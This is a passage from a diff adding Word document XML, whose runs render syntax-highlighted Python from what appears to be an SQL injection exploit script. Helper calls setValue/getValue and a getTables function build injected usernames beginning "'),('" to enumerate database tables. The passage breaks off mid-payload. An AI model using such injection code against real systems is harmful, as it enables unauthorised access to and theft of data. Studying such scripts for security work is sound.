+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>format</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>tmp_username</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>signal</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>setValue</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>tmp_username</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>payload</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> += </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="B5CEA8"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="C586C0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>return</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>getValue</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>tmp_username</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="240" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="6A9955"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t># Get tables</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="569CD6"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>def</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>getTables</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>username</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>database</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>):</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="B5CEA8"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>0</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>signal</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="569CD6"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>False</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>tmp_username</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>""</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="C586C0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>while</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>signal</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> != </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="569CD6"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>True</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>tmp_username</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>{0}{1}</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>format</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>username</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>payload</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>"'),('</w:t>
+      </w:r>
